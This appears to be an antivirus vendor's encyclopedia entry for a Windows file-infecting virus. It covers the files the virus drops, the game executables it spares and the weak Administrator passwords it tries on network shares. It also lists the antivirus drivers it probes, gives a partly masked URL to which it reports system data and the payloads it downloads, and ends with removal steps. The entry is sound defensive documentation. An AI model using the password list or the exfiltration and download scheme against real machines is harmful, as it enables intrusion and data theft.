Detection added	Apr 17 2007 11:26 GMT
Description added	Sep 05 2007
Behavior	Virus

• Technical details
• Payload
• Removal instructions

This virus infects Windows executable files. It is a Windows PE EXE file.

Installation

When launching, the virus extracts the following files from its body:

%WinDir%\AppPatch\deamon.dll – this file is 3 072 bytes in size;
%WinDir%\c_126.nls - this file is 31744 bytes in size. 

It creates the following registry key:

which contains a link to the virus executable file.

The virus infects all write accessible Windows executable files (PE-EXE) on all disks on the victim computer and in accessible network folders. The virus does not infect files with the following names:

wooolcfg.exe
woool.exe
ztconfig.exe
patchupdate.exe
trojankiller.exe
xy2player.exe
flyff.exe
xy2.exe
au_unins_web.exe
cabal.exe
cabalmain9x.exe
cabalmain.exe
meteor.exe
patcher.exe
mjonline.exe
config.exe
zuonline.exe
userpic.exe
main.exe
dk2.exe
autoupdate.exe
dbfsupdate.exe
asktao.exe
sealspeed.exe
xlqy2.exe
game.exe
wb-service.exe
nbt-dragonraja2006.exe
dragonraja.exe
mhclient-connect.exe
hs.exe
mts.exe
gc.exe
zfs.exe
neuz.exe
maplestory.exe
nsstarter.exe
nmcosrv.exe
ca.exe
nmservice.exe
kartrider.exe
audition.exe
zhengtu.exe

The virus writes its executable file to the beginning of the file being infected, displacing the original contents of the file downwards.

In order to infect files located in network folders, the virus attempts to connect to remote machines using the Administrator account and one of the following passwords:

zxcv
qazwsx
qaz
qwer
!@#$%^&*()
!@#$%^&*(
!@#$%^&*
!@#$%^&
!@#$%^
!@#$%
aasdf 
sdfgh
!@#$
654321
123456
12345
1234
123
111

The virus also sends information to the remote malicious user's site about the amount of free space on the C disk, the operating system and Internet Explorer versions on the victim machine, and about the presence of drivers in the system which have one of the names listed below:

Hooksys
KWatch3
KregEx
KLPF
NaiAvFilter1
NAVAP
AVGNTMGR
AvgTdi
nod32drv
PavProtect
TMFilter
BDFsDrv
VETFDDNT

This information is sent in the following request to the remote malicious user's site:

http://****mrw0rldwide.com/co.asp?action=post&HD=<amount of free space>
&OT=<operating system version> &IV=<version of Internet Explorer>
&AV=<installed drivers>

The virus also gets a list of files to be downloaded from the following link:

It then downloads files from the list, saves them to the Windows temporary directory and launches them for execution.

At the time of writing, the virus downloaded files from the following links:

http://down****net/css.jpg
http://down****net/wow.jpg

and saved them as shown below:

%Temp%\css.jpg - this file is 62 792 bytes in size. It will be detected by Kaspersky Anti-Virus as Trojan-PSW.Win32.OnLineGames.afd;

%Temp%\wow.jpg - this file is 40 241 bytes in size. It will be detected by Kaspersky Anti-Virus as Trojan-PSW.Win32.WOW.sv.

If your computer does not have an up-to-date antivirus, or does not have an antivirus solution at all, follow the instructions below to delete the malicious program:

1. Use Task Manager to terminate the malicious process.
2. Delete the original virus file (the location will depend on how the program originally penetrated the victim machine).
3. Delete the following parameter from the system registry (see What is a system registry and how do I use it for details on how to edit the registry).
   [HKCR\CLSID\{C111980D-B372-44b4-8095-1B6060E8C647}]
4. Delete the following files:

   %WinDir%\AppPatch\deamon.dll
   %WinDir%\c_126.nls
   %Temp%\css.jpg
   %Temp%\wow.jpg

5. Delete all copies of the virus from the hard disk:
6. Update your antivirus databases and perform a full scan of the computer (download a trial version of Kaspersky Anti-Virus).